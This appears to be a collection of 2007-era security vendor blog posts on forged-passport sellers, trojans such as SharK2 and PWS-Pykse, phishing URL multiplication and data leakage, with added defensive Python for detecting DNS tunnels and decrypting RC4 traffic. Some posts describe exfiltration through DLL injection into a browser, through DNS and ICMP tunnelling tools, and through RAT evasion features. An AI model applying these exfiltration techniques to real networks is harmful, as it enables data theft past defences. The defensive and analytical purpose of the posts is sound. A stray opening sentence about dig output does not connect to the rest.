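Against real dig output, feed the answer sections of lookups spaced a few minutes apart; a content-delivery network with short TTLs but stable, related addresses stays below the churn and prefix thresholds.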

Need a passport or driving license? Find them on the web from €400

The wonders of the underweb never cease to amaze me some days. Not because of the devious goings-on that go on but because some groups are so blatant about their devious goings-on.

Need a passport? You might have visited http://www.new-pasport.org. [Google cache]

Allow me to translate:

Passports of the European Union

» Lithuania - 2500 euros without an advance payment and 2000 euros on an advance payment in 50 %
» Latvia - 2500 euros without an advance payment and 2000 euros on an advance payment in 50 %
» The Great Britain - 3500 euros without an advance payment and 3000 euros on an advance payment in 50 %
» Germany - 3500 euros without an advance payment and 3000 euros on an advance payment in 50 %

Driving licenses too:

Driving license of the European Union:

» Lithuania - 600 euros on an advance payment in 50 % and 800 euros without an advance payment
» Latvia - 600 euros on an advance payment in 50 % and 800 euros without an advance payment
» The Great Britain - 600 euros on an advance payment in 50 % and 800 euros without an advance payment
» Germany - 600 euros on an advance payment in 50 % and 800 euros without an advance payment

The payment method is interesting too: it’s cheaper if you pay upfront. If you don’t trust the document dealer you can opt to pay a little more in two Western Union payments, withholding half the payment by holding back the code needed to claim the second transfer until your fraudulent documents arrive.

This isn’t the first time we’ve seen this operation either; they have some history on a .biz version of the domain too.

Almost a year ago the BBC broadcast a Panorama program in which a researcher purchased 20 fake or fraudulent passports, some of them at great personal risk to the reporter. You can see a clip of the program at BBC Online or the whole program here.

UK law is pretty clear on this one: travelling into the UK on a false, forged or stolen passport carries a prison sentence of up to 10 years, while making a false declaration to obtain a passport can lead to a prison sentence of up to 2 years.

Avert Labs’ 2008 Threat Predictions

It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

There is no External

A common security theme in corporate America is to secure the outside Internet from the safe intranet. As a penetration tester, I’ll tell you that if you have over 1000 employees there is no “outside”.

Firewalls, NAT devices, and anti-exploitation techniques have made traditional remote exploitation extremely difficult. Pure remote exploitation over a technology such as RPC, IIS, etc. still occurs, but it’s much less common. Instead, attackers have transitioned to user-driven attacks such as phishing, malicious emails, malicious websites, or malicious documents. The basic idea is to get your users to exploit their box for the attacker. Once the user does something unwise, the workstation inside your network is owned. If you have 1000+ workstations, there is virtually no chance that one of your employees won’t eventually enable this type of attack. When you factor in USB sticks, Wi-Fi, VPN access, and laptops that travel, no reasonably large network can assume the internal network doesn’t touch the Internet.

Now that we’ve established the Internet can get into your internal hosts, can it get out?

Brad Antoniewicz’s recent blog describes several data exfiltration techniques. I’ve had success with DNS tunneling. Almost every firewall allows outbound DNS queries and the technology is well proven. Once your local workstation has been exploited, DNS tunneling will let the data out. However, my favorite technique is simple HTTP. First, outbound HTTP access is almost as universal as outbound DNS. To me, there are several benefits of HTTP traffic over DNS Tunnels:

1. DNS tunneling is innately anomalous – the messages are larger and more frequent than normal DNS traffic. Similarly, you’re likely ignoring TTL values. All of these can be red flags.

2. Programming an HTTP tunnel is simple. You set up a fake page, set up a trigger value for data, and POST/GET data as needed. You simply need to use the straightforward Microsoft InternetOpen() and related functions.

3. Many hosts now have firewalls that prompt to allow outbound access by application. In general, it’s best to use DLL injection to hook your callback into IE to get its access and to use any proxy authentication that may be needed. This technique almost always lets me out to the Internet from a workstation.

In various penetration tests, I’ve successfully used remote access tools that utilize HTTP traffic by hooking IE. It’s been VERY effective. Do you have technology to prevent this type of remote command and control?

In closing, as you design your network security policies and deploy technologies dependent on being safe from within, I encourage you to think of both how threats get into your network and how they can get out. If an attacker can do those two things, depending on your perimeter, this is asking for a security incident.

Someone get the mop, we have a data leak!

Corny titles aside, you might be surprised all of the ways that your “secure” internal corporate data can become unsecured public information by one disgruntled employee. Data leakage is when your internal corporate data is released to the public or anywhere else that is not in your control. This can be performed mainly in two ways, where the number of variants of each method can be virtually limitless.

  • Physical removal of the data via hardcopy or softcopy on removable media
  • Transfer of the data over the internet via email, FTP, SCP, etc..

Did I say limitless variants?! Yikes! So how do we prevent this? Well, it’s rather unlikely that all of your employees will undergo a strip search to validate that they do not have any paper shoved down their pants, but if we don’t allow access to those documents in the first place, and if we make sure they are properly disposed of (i.e., shredded) when they are printed, it might be possible to limit some of our exposure.

These physical threats are tricky issues that may never be fully solved, but they are extremely important to be mindful of. In this post, we’ll focus on the non-physical side of data leakage. Right off the bat, let’s disable the easy stuff:

  • Discontinue the use of writeable CD/DVD drives on your client systems. There’s normally no reason for the average user to burn CDs/DVDs. It might be a good idea for a manager or someone with higher privileges to first filter this data before burning it to disk. That is, of course, if you trust your managers. :)
  • Disable USB/FireWire storage and removable media. You can disable USB altogether if your company is not USB keyboard/mouse dependent.

These two basic things will force our mischievous friends to look at the internet as a means of transfer. On nearly every firewall/architecture review, I have one finding that states “Inadequate Egress Filtering”. Egress filtering is controlling the traffic leaving your organization, or traversing from a trusted to untrusted zone (i.e internal network to internet).

Although most companies I work with may or may not have a proxy server to scrutinize outbound traffic, they also have a ton of additional services permitted through the firewall, hence the “Inadequate Egress Filtering” finding. An additional problem that compounds this issue is the separation between the security staff and the firewall staff. This problem makes it hard for the security staff to accurately assess the firewall policy, and thus forces them to test these things on their own. To address this issue, security staff can simply set up a host that has all ports open and place it on the internet. Use nmap to port-scan the host from inside:

nmap -sT -p 0-65535 [host]

What this will do is check which ports are allowed out through the firewall. There are some online services that will let you do this as well and even some messaging programs will have all ports open on their login servers. With the information presented by nmap, we can then get an idea of the existing potential areas for data leakage.

It’s extremely important to understand that any service can run on any port, which means that even the smallest allowance can permit someone to transmit data out to the internet. Let’s look at some common methods:

SSH Tunneling: Attackers can easily tunnel anything they’d like over SSH and, as we mentioned, just because the default port for SSH is TCP/22 doesn’t mean it can’t run on any other one. SSH can also be proxied, so application filters are even more important. Bottom line: if an attacker can get SSH outbound, they can do anything!

DNS Tunneling: OzymanDNS (http://www.doxpara.com/ozymandns_src_0.1.tgz) can tunnel SSH over DNS! Yes, over DNS. So think twice about that permit udp any any eq 53; internal users should query an internal DNS server, which is responsible for their outbound queries.

ICMP Tunneling: If all else fails, attackers may try PingTunnel (http://www.cs.uit.no/~daniels/PingTunnel/), which, as the name implies, allows SSH over ICMP! This kind of thing may make you think twice about allowing ICMP outbound to any host. If your network engineering staff really needs it as a tool, consider allowing ICMP only to particular hosts.

In an ideal situation, you’d have no outbound allowances without first being forced through a proxy server with application-layer filtering. Even then, you only allow HTTP/HTTPS. You can then use a variety of software that looks for certain strings in HTTP/HTTPS or instant-messaging sessions and then notifies you or prevents the user from sending the data that matches. This is an excellent solution and should be deployed everywhere. For more information, Google “Data Leakage” and those applications will present themselves to you.

This isn’t meant to be fully comprehensive, but just to show the risks associated with the smallest allowance. If you can limit traffic outbound and scrutinize it wherever possible, you should be OK. Well… that’s if you try not to think about employee EVDO cards or test DSL lines that terminate at employee cubicles. =]
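The DNS tunneling that this post and “There is no External” above both mention is visible from the resolver side, because the payload has to ride in query names. Below is an added example, not code from the original posts, that scores resolver query logs for the tell-tale pattern; the log format, names, addresses and thresholds are constructed, and the "zone" is approximated as the last two labels, which is an assumption of this example.

```python
"""Flag DNS-tunnelling candidates in resolver query logs.

Added example, not code from the original posts. A tunnel has to push its
payload through query names, so it shows up as many queries to one zone,
almost all with a never-seen subdomain, carrying long high-entropy labels.
The log format and every name/address below are constructed; "zone" is
approximated as the last two labels (no public-suffix list), an assumption
of this example.
"""
from __future__ import annotations

import math
import random
from collections import defaultdict

_rng = random.Random(2007)                      # fixed seed: reproducible sample
_B32 = "abcdefghijklmnopqrstuvwxyz234567"


def _payload_label(n: int) -> str:
    """Constructed tunnel-style label: random base32-like text."""
    return "".join(_rng.choices(_B32, k=n))


# Constructed log lines: "<time> <client> <qtype> <qname>", one query per line.
SAMPLE_LOG = "\n".join(
    [f"2007-12-03T10:15:0{i} 10.0.0.5 A www.corp-example.test" for i in range(4)]
    + ["2007-12-03T10:15:05 10.0.0.5 A mail.corp-example.test",
       "2007-12-03T10:15:06 10.0.0.9 A updates.vendor-example.test",
       "2007-12-03T10:15:07 10.0.0.9 MX corp-example.test"]
    + [f"2007-12-03T10:16:{i:02d} 10.0.0.23 TXT "
       f"{_payload_label(40)}.{_payload_label(12)}.t.tunnel-example.test" for i in range(8)]
)


def shannon_entropy(s: str) -> float:
    """Bits per character of `s` (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts: dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> tuple[str, str]:
    """Return (zone, subdomain); zone = last two labels (see assumption above)."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(text: str) -> list[tuple[str, str, str]]:
    """Parse '<time> <client> <qtype> <qname>' lines into (client, qtype, qname)."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            entries.append((parts[1], parts[2], parts[3]))
    return entries


def zone_features(entries: list[tuple[str, str, str]]) -> dict[str, dict]:
    """Per zone: query count, clients, unique-subdomain ratio, mean length/entropy."""
    per_zone: dict[str, list[tuple[str, str]]] = defaultdict(list)
    for client, _qtype, qname in entries:
        zone, sub = split_name(qname)
        per_zone[zone].append((client, sub))
    feats = {}
    for zone, rows in per_zone.items():
        subs = [s for _, s in rows]
        feats[zone] = {
            "queries": len(rows),
            "clients": len({c for c, _ in rows}),
            "unique_ratio": len(set(subs)) / len(subs),
            "mean_len": sum(len(s) for s in subs) / len(subs),
            "mean_entropy": sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs),
        }
    return feats


def tunnel_candidates(text: str, min_queries: int = 5, min_unique: float = 0.8,
                      min_len: float = 30.0, min_entropy: float = 3.5) -> list[str]:
    """Zones whose query pattern looks like a covert channel rather than browsing."""
    flagged = []
    for zone, f in zone_features(parse_log(text)).items():
        busy = f["queries"] >= min_queries and f["unique_ratio"] >= min_unique
        payload_like = f["mean_len"] >= min_len or f["mean_entropy"] >= min_entropy
        if busy and payload_like:
            flagged.append(zone)
    return sorted(flagged)


if __name__ == "__main__":
    for zone, f in zone_features(parse_log(SAMPLE_LOG)).items():
        print(f"{zone:25s} q={f['queries']:2d} uniq={f['unique_ratio']:.2f} "
              f"len={f['mean_len']:5.1f} H={f['mean_entropy']:.2f}")
    print("candidates:", tunnel_candidates(SAMPLE_LOG))
```

On a real resolver, run the features over a sliding time window per client, since a normal zone queried by thousands of hosts also has many distinct subdomains in aggregate.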

Skype malware in the limelight again

With Skype gaining popularity in the VoIP-IM space, it has become an attractive target for malware authors. Very recently we had blogged about the W32/Pykse.worm which used Skype for spreading.

Today we came across a new trojan, PWS-Pykse, which attempts to steal Skype usernames and passwords. This trojan poses as a “Skype-Defender” plug-in for Skype. It displays a fake login window to trick the user into entering their login credentials:

Fake Skype login window

The PWS-Pykse trojan does not spread by itself. It relies on social engineering techniques to trick the victim into executing it and is usually posted on dodgy sites or forums. Upon execution, this trojan kills any running instance of Skype and displays a fake Skype login window. It then captures the username and password entered by the victim and posts them via HTTP to the trojan author’s website.

An alert Skype user would notice that it looks very different from the normal Skype login window – especially since none of the hyperlinks or options displayed are functional! McAfee users are protected against this threat from the 5143 DAT onwards.

“Avert Labs Darwin Award” Nomination

This article literally made me laugh out loud, so I had to write about it.

I hope you’ve heard of the Darwin Awards. This would be my nomination for the Avert Labs Darwin Award (if we had such an award).

Evidently, a company called WorkSpace had a batch of their Apple computers stolen from their office. One of these computers had an application installed called Flickrbooth, which has the ability to automatically take snapshots with a webcam and upload them to a designated Flickr account.

Well, a few days ago, they discovered pictures of the new “owner” of their computers on their Flickr account. I present to you the face of today’s modern cybercriminal:

I guess this is a low-cost way of Lo-jacking your computer. :-)

The end of Downloader-AAP?

Germany’s Federal Criminal Police Office (the BKA) announced today that it busted an international group of phishers, arresting 10 persons and seizing a number of computers together with other evidence. From the press release it’s evident this is the group that has been harassing the world with phishing emails carrying Downloader-AAP as an attachment.

Downloader-AAP is ranked first in the list of ‘Top Corporate User Malware’ in our Avert Labs Threat Library. For many months there have been several waves a week of phishing emails sent with new variants of this downloader, which when executed would install some keylogging trojan. The emails typically look like a receipt sent from some company, with details supposedly to be found in the attached .zip. Some of these emails even claimed to come from German law enforcement agencies, stating that you’ve been caught sharing music, that content from your hard disk has been confiscated using the ‘Bundestrojaner’, and that the report (the ‘protocol’) is attached. As in the example below:

I sincerely hope this is the last we’ve seen from this group.

China strikes back

Following recent allegations from the USA, Germany and lately Australia and New Zealand that government and military networks have been attacked out of China, and an earlier warning from the German Federal Office for the Protection of the Constitution (Verfassungsschutz) in February that increased hacking activity out of China had been detected, it is now China that steps forward and claims they “have suffered ‘massive’ losses of state secrets through the Internet”.

According to a Reuters news report, the Vice Minister of Information Industry Lou Qinjian said that China’s computer networks were riddled with security holes and that the United States and other hostile powers were exploiting those for “political infiltration”.

While I’m definitely not in any position to judge on who did what to whom, this is starting to look like a contest for the title of ‘Least Secure Government IT Systems’.

Phone Modders Beware!

For mobile phone fanatics, Woron Scan is a tool used to extract certain cellular information from a SIM card. We recently discovered a new Trojan (Spy-Wokiscan) that repackages the Woron Scan utility but also installs additional Trojans that are used to steal the victim’s cellular account information along with more data from the local computer. This Trojan is quite interesting, as it takes a utility and repackages it to include Trojans. Once the Trojan installs itself, it starts the Woron Scan utility. Then it takes the Woron Scan results and sends them to a remote Russian site.

Putting aside the fact that it is illegal in just about every country to use a cloned SIM, there are also dangers in using the software for creating these cloned SIM cards. This means that phone modders need to be aware of the source of the program they are using. Running this Trojan-repackaged Woron Scan will cause the SIM card’s private information to be sent to a remote hacker. Then, once a cloned SIM is created, that person can use the cloned mobile phone to make calls as they please – while leaving their victims to prove those calls weren’t theirs. In these days of cybercrime and terrorism, modders should really consider the risks involved in modding their phones.

Just a note for those who decide to use a cloned SIM card: Most cellular providers have the ability to track and log certain anomalies caused by the cloned SIM. That means the chances are pretty good that the cloned SIM will be blocked or the user of the cloned SIM will be getting a call from the local authorities.

For further information regarding the Spy-Wokiscan, please visit our VIL description located at http://vil.nai.com/vil/content/v_142989.htm.

SharK2: Trojan Creation Made Easy!

Malware authors have always been coming up with new and improved ways to control compromised machines. Remote-access Trojans have been in use for a long time. One of the most infamous is Back Orifice.

With the prevalence of DIY kits, every kid on the block has the ability to invade other people’s computers at whim. But what has changed over the course of time is the ease of use of these kits along with the advancement in stealth technologies. SharK is one such remote-access Trojan kit that allows the attacker to customize the Trojan with loads of features available within the toolkit.

Server

Fig 1: SharK2 Server configuration options.

In a nutshell, the server created using the kit can be typically configured to do the following:

  • Load the Trojan at every startup using ActiveX keys specified in the registry.
  • Social-engineer the victim to believe he has opened a genuine executable, like notepad.
  • Ability to bind with other genuine files.
  • Capable of acting like a retrovirus, disabling antivirus software. The kit also gives users the option to blacklist and cripple various security and analysis tools on the victim machine.
  • Stealth options such as melting the server on execution, modifying file attributes, modifying the server’s file creation time, or opening ports only when there is an Internet connection.
  • Encrypts the header and uses its own stub.

One of the unique characteristics of this kit is its ability to identify sandboxes. Even though anti-sandboxing techniques have been discussed widely, this kit is probably one of the few to implement this feature. Combined with this are anti-debugging and VMware-detection techniques that could make the process of analyzing this Trojan a little difficult.

Client

Fig 2: Web Downloader Component

Once infected, the victim would connect back to the specified address and port.

  • Like many Trojans, SharK uses the RC4 cipher to encrypt the traffic.
  • Keylogger works with WH_KEYBOARD_LL hooks.
  • Interactive DOS-Shell
  • Manipulate running processes, windows, and services from the remote console.
  • Interactive Process blacklisting, which alerts the attacker if the blacklisted process is found on the victim machine and prompts the attacker to take action (see Fig 3).
  • Code injection into a hidden Internet Explorer window in an attempt to bypass firewalls.
  • Uses Web Downloader to download and execute files on the victim machine (see Fig 2).
  • Attacker could redirect victims to various phishing Web sites.

Fig 3: Interactive process blacklist
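RC4 is cheap to implement and therefore popular with RAT authors, but it is only as strong as its key handling. The following is an added example, not code from the SharK kit: a minimal RC4 an analyst can use to decrypt captured traffic once the key has been extracted from a server’s configuration, together with a demonstration of the failure mode that matters in practice. Whether SharK re-keys from a static key for every packet is not stated here, so the keystream-reuse part is a general illustration; the key and the two C2 messages are constructed.

```python
# Added example (not SharK's code): a minimal RC4 so an analyst can decrypt captured
# RAT traffic once the key has been pulled from the server's configuration, plus a
# demonstration of why a static key with no per-message nonce is fragile.
# The key and messages below are constructed for illustration.

def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: build the 256-byte state permutation from the key."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: RC4 is a stream cipher, so both are XOR with the keystream."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Keystream = plaintext XOR ciphertext; needs no key at all."""
    return bytes(p ^ c for p, c in zip(known_plaintext, ciphertext))


def decrypt_with_keystream(keystream: bytes, ciphertext: bytes) -> bytes:
    """Strip as many bytes as the recovered keystream covers."""
    return bytes(k ^ c for k, c in zip(keystream, ciphertext))


def demo() -> dict:
    # Assumed key, as if read out of a captured server's configuration block.
    key = b"demo-rat-key"
    # Constructed C2 messages. If the RAT restarts RC4 from the same key for every
    # packet (no nonce), every packet shares one keystream.
    beacon = b"PING host=VICTIM-PC ip=192.0.2.10"
    command = b"SHELL cmd.exe /c dir c:\\users"
    enc_beacon = rc4_crypt(key, beacon)
    enc_command = rc4_crypt(key, command)

    # 1. With the key: straightforward decryption of the captured packet.
    with_key = rc4_crypt(key, enc_command)

    # 2. Without the key: the beacon format is predictable, so one known packet
    #    yields the keystream prefix, which then decrypts every other packet up
    #    to that length.
    ks = recover_keystream(beacon, enc_beacon)
    without_key = decrypt_with_keystream(ks, enc_command)
    return {"with_key": with_key, "without_key": without_key, "keystream_len": len(ks)}
```

The first path is the everyday one: pull the key out of the configurator’s output or the server’s data section and run the capture through rc4_crypt. The second path is why “encrypted” RAT traffic is often readable anyway: a predictable beacon gives the keystream for free, and any later packet encrypted under the same static key falls to a plain XOR.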

The kit is constantly updated with new features. With what is alleged to be its leaked source code up for sale on various forums, more versions are likely to emerge. A look at our sample collection was enough to establish that malicious actors have already started capitalizing on this toolkit.

We at McAfee Avert Labs are, as always, on the lookout for new threats. With the current DATs we detect the configurator as BackDoor-DKG.cfg and the server as BackDoor-DKG.

BlackHat and DefCon Presentations are live

McAfee Avert Labs presented at both BlackHat and DefCon this year, with one talk at each.

John Viega and David Coffey presented Building an Effective Application Security Practice on a Shoestring Budget at BlackHat. I heard quite a bit of positive feedback on this at the conference itself. Kudos and extra points to both John and Dave for working in beer references!

Toralv Dirro and Dirk Kollberg presented Trojans: A Reality Check at DefCon. This one was also very well received (I actually got to attend this one!) and they were swamped (maybe not the best choice of word, but many people came up to the podium anyway) with questions afterward. They gave a great update on Trojans in general as well as a technical dive into recent developments on the German malware scene. Dirk even showed a fascinating command-and-control demo that illustrated the ease of malware creation and control.

Enjoy!

Zero-day activity targeting Ichitaro vulnerability

On 3rd August an exploit was discovered in the wild targeting a vulnerability, unpatched as of this writing, in the Japanese word processor JustSystem Ichitaro. We identify the threat as the Exploit-TaroDrop.c trojan.

The modus operandi closely resembles the 0-day attack we blogged about in April 2007. The attack, delivered as a maliciously crafted document, drops BackDoor-DKI.gen, a trojan that was used, among other malware, in the April attacks. The shellcode drops a clean copy of the document as “aa.jtd” and re-opens it in the word processor, the usual decoy trick to hide that anything went wrong. Beyond that, an additional layer of obfuscation has been added on top of the basic XOR encryption we saw in the past.

We caution all Ichitaro users that we may continue to see such attacks against this localized application. More details on Exploit-TaroDrop.c are at http://vil.nai.com/vil/content/v_142899.htm .

Looking for Love or Puppies?

Cybercrime has always tried to wriggle its way into the areas of our online experience that seem the most safe and familiar. Using social engineering to tug at our heartstrings or tap into our fears, this form of crime makes us feel sorry or scared enough to divulge our most valuable personal information. There have been a couple of articles in the news describing how the well-known Nigerian scam and generic identity theft have reached interesting new dimensions.

In this variation on the Nigerian scam, a beautiful woman from Russia contacts someone through MySpace, and romantic exchanges ensue. The woman says she will come visit, which eventually leads to her having trouble transferring money for the plane ticket, and then asking for (financial) assistance.

The new twist on identity theft deals with using the details of a prize-winning dog’s pedigree to sell unrelated puppies. The dog’s details were found on a Web site accidentally posted by an employee.

Neither example is particularly surprising, but together they indicate an underlying trend. Criminals are finding better angles for social engineering, and more uses for personal details beyond the usual government ID and credit card data. The tech savviness of the general Internet public is not keeping up with that of Internet criminals. And now they’re moving squarely into the softest and fuzziest of arenas: cute animals and romance.

I gotta wonder what’s next–attacking rainbows and sunshine?

Security Cost of Social Computing

As recently as five years ago, most of us probably communicated electronically only through either e-mail or phone. If someone wanted to pry into these communications, they had to tap our phones, steal our phone records or hack our e-mail accounts. But today, we voluntarily leave bits and pieces of our personal lives scattered all over the Internet. From elaborate profiles on social networking sites (such as Facebook, which, for example, has experienced a growth explosion in Australia as of late) to innocuous comments on personal blogs of others, we publish our likes and dislikes, our affiliations, political views and even our day to day routine for pretty much the whole world to see. In fact, younger Internet users appear to be leading the way. And it’s not all just play either. We increasingly rely on sites like Seek, monster.com and LinkedIn to advance our careers as well. These days, not only do we seem to leave a part of our digital personality wherever we spend a lot of time online, but we also seem to bundle a much greater part of our lives into this digital personality.

Now, is it too much of a stretch to imagine digital identity thieves and other fraudsters working hard, even as we speak, using the awesome power of modern search engines to put together these various online clues to piece the puzzle that is the digital you? I think not! I believe that this is already happening on a wider scale than any of us would like to believe. We’ve made it easier for anyone to discover who we are and increased their chances to get acquainted with us, no matter where in the world they are. Especially with social networking sites and online dating sites, shady characters could easily work their way into our trust gradually, starting off as a “friend of a friend of a friend” or a potential love interest. From the stories I’ve heard, this seems to be taking place a lot more than I would have considered to be the case.

To compound the issue, online services are becoming extremely complex. With a diverse set of features and the ability to host third-party applications or mash-ups, these online platforms are getting as complex as operating systems. What does this all mean? It means that online services are increasingly exposed to attacks such as cross-site scripting (XSS) and cross-site request forgery (CSRF), not to mention the oldest trick in the book: social engineering. Unfortunately, traditional antivirus software, personal firewalls, and host-based intrusion prevention products are not always well suited to address these threats at present.

Our online world is changing, and it’s changing fast. With the explosion of exciting new possibilities comes a set of unfamiliar risks. So what do we do? Do we curb our enthusiasm and say no to progress? Not at all. Fear is hardly the solution. All we have to do is be a bit more proactive about our online security. Educate ourselves on the latest threats. Think twice about what personal information we share online and with whom. If you happen to notice something “fishy” going on, notify someone who can look into it. While the security industry is moving fast and innovating to provide better protection, you are still the single most important contributor to online security, both yours and ours.

Be safe and have a great social computing experience!

Revisiting the Crystal Ball: Updating Our 2007 Predictions

At the midyear mark when the sun is at its farthest point north—at least in our hemisphere—it seems appropriate to revisit our predictions for the Top 10 security threats in 2007. Just how good was the McAfee Avert Labs team at reading the tea leaves six months ago?

I conferred with my colleagues in Avert Labs and rounded up the latest data to see if the facts support our prognostications. Let’s revisit our forecast and see how well we did. I decided to score each prediction on a scale of 1 to 5, with 5 being the highest possible score for excellence in crystal ball gazing. (These are in no particular order.)

1. Password-stealing web sites are on the rise.
Score: 5

We continue to see exponential growth in phishing sites. Based on the number of sites blocked by our phishing traps, activity in January alone increased by 358 percent vs. the entire fourth quarter of 2006. February and March rose by at least 200 percent each compared to the same period. In total, the first three months of this year saw a 784 percent increase—with no slowdown in sight.

We also anticipate an increase in the abuse of open-content sites, such as Google and Wiki pages. Google accounts can be used to host drop boxes (via Gmail) or phishing sites (Google Docs). Even Internet archive sites will suffer.

2. Spam, particularly image spam, is on the increase.
Score: 3

The total volume of trap-based spam has stayed fairly flat during the first part of the year. Image spam accounted for 65 percent of all spam at the beginning of the year and has since declined a bit. Image spam, which embeds its message in an image rather than text (typically pump-and-dump stock, pharmacy, and degree spam), is still a force to be reckoned with. It hovers between 30 and 50 percent of all spam that tries to find its way into users’ inboxes.

3. The popularity of video on the web makes it a target for hackers.
Score: 4

There’s no doubt that hackers are riding the wave of online video available on hugely popular social networking sites like YouTube and MySpace. Astute social engineering— coupled with video’s inherently easy-to-program format—has enabled cybercriminals to come up with a variety of clever tricks. Witness these recent MySpace exploits:

Earlier this year, hackers targeted fans of the French rock band MAMASAID. When fans visited a MySpace account promoting the music group, they’d get a Trojan called JS/SpaceStalk installed on their computers through an insecure feature in QuickTime, HREF Tracks, which allows links to be opened automatically when you run a movie. This link was misused to lure visitors to malicious web sites hosting spyware and other exploit code.

MySpace has also been the target of phishing scams. After gathering MySpace user credentials from phishing sites, spammers log in to those accounts and post spam messages on other users’ pages. This is hard to stop because the accounts being abused are legitimate ones, which MySpace can’t simply shut down.

4. Mobile phone attacks will become more prevalent.
Score: 0

Surprisingly, mobile malware numbers are down for the first quarter of 2007 (12 attacks), compared to the first quarter of 2006 (47).

5. Adware will go mainstream.
Score: 3

Because adware has gotten such a bad rap, businesses are experimenting with more creative ways to deliver ads on the Internet. BitTorrent is setting a trend by offering free ad-supported downloads rather than paid downloads for its online TV network, so customers see ads before and after watching an episode or a movie—much like traditional television. YuMe Networks is also likely to follow this model.

6. Identity theft and data loss will continue to be a public issue.
Score: 5

According to Attrition’s Data Loss Database—Open Source, more than 13.7 million records have been breached thus far. Compare that to 1.8 million during the same period last year! We maintain our belief that the unauthorized transmission of information will become more of a risk for enterprises. This includes loss of customer data, employee personal information and intellectual property from a variety of channels—applications, networks, and even physical channels, like USB devices, printers, fax and removable storage. If you want to get a more detailed picture of how grave the problem is, take a look at the recent Datamonitor report [“Datagate: The Next Inevitable Corporate Disaster?”] According to the report, more than 60 percent of respondents interviewed experienced data loss within the last year, and an astounding 33 percent believe it could put them out of business!

7. The use of bots will increase.
Score: 3

The statistics from our daily collections show that bots actually declined to a low point in November 2006, but are now increasing again. The numbers aren’t as high as they were 12 months ago, but they’re definitely heading up.

8. Parasitic malware will make a comeback.
Score: 5

There’s no doubt about this one. Philis and Fujacks continue to be active parasitic families, and Avert Labs has classified more than 150 new variants of these two families since the beginning of 2007. And let’s not forget other families like Sibil, Grum, and Expiro.

9. The number of rootkits on 32-bit platforms will increase.
Score: 4

According to our Virus Tracking Map, approximately 200,000 systems have reported rootkit infestations since the beginning of 2007, a 10 percent increase over the first quarter of 2006. (By the way, if you want to check your system, download our free Rootkit Detective. And, of course, VirusScan Enterprise includes antirootkit technology.)

10. Vulnerabilities will continue to cause concern.
Score: 5

Not only do they continue to cause concern, there are more of them to worry about than ever before. In January and February 2006, Microsoft issued patches for five important and five critical vulnerabilities. During the same months this year, Microsoft patched nine important and 27 critical vulnerabilities.

So, when all is said and done, it looks like our oracles hit the mark in most areas. Stay tuned for a re-evaluation of these trends later this year.

Phishers like URL multiplying techniques

In April 2007, the number of unique phishing websites detected by the APWG was 55,643. In its report, the association shows a 166% rise from the previous month and a 48% rise over the previous high for phishing URLs (October 2006).

This trend is indeed rising, and it does not track the total number of unique phishing reports submitted to the APWG. That other statistic is steady and, surprisingly, known mirror sites are now more numerous than known attacks.

In the report, Laura Mather, Ph.D., Senior Scientist at MarkMonitor, explains this huge number. As in late 2006, phishers have returned to the tactic of putting large numbers of mirror sites on the same domain. She reports having seen cases with thousands.

Typically, URL multiplying techniques involve the apparently automated creation of subdomains (xxxx.fakedomain.com) to establish discrete hosts for phishing sites, or the use of different directories on the same domain (xxxx.fakedomain.com/xxxx).

Criminals do this to get around the fraudulent-site blocking that Internet Explorer 7.0 and Firefox 2 deploy to protect consumers: each new subdomain or directory yields a URL that is not yet on the blocklist.
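To make the multiplication concrete, here is an added example (not from the APWG report or MarkMonitor) that collapses a list of phishing URLs to their registrable domain and flags domains with many host/path variants. The URLs are constructed, and the two-label domain heuristic is a stand-in for a real Public Suffix List lookup.

```python
# Added example, not from the APWG report or MarkMonitor: groups a list of phishing
# URLs by registrable domain to show how subdomain/directory multiplication inflates
# unique-URL counts and defeats exact-URL blocklists. The URLs are constructed.
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: one phisher "multiplying" a single domain, plus one unrelated site.
SAMPLE_URLS = [
    "http://a1b2.fakedomain.example/login/index.htm",
    "http://c3d4.fakedomain.example/login/index.htm",
    "http://e5f6.fakedomain.example/login/index.htm",
    "http://fakedomain.example/q7z2/login/index.htm",
    "http://fakedomain.example/r8y3/login/index.htm",
    "http://www.othersite.example/update/",
]


def registrable_domain(host: str) -> str:
    """Owner-controlled part of the hostname.

    Simplification: the last two labels. Production code must consult the Public
    Suffix List, otherwise 'bank.co.uk' collapses to 'co.uk'.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def group_by_domain(urls):
    """Map registrable domain -> list of URLs seen under it."""
    groups = defaultdict(list)
    for url in urls:
        host = urlsplit(url).hostname or ""
        groups[registrable_domain(host)].append(url)
    return dict(groups)


def multiplied_domains(urls, threshold=3):
    """Domains with at least `threshold` distinct URLs: the signature of automated
    URL multiplication rather than a single phishing page."""
    return sorted(d for d, us in group_by_domain(urls).items() if len(set(us)) >= threshold)


def blocklist_sizes(urls):
    """How many entries each blocking strategy needs to cover the same set."""
    return {"exact_url": len(set(urls)), "registrable_domain": len(group_by_domain(urls))}
```

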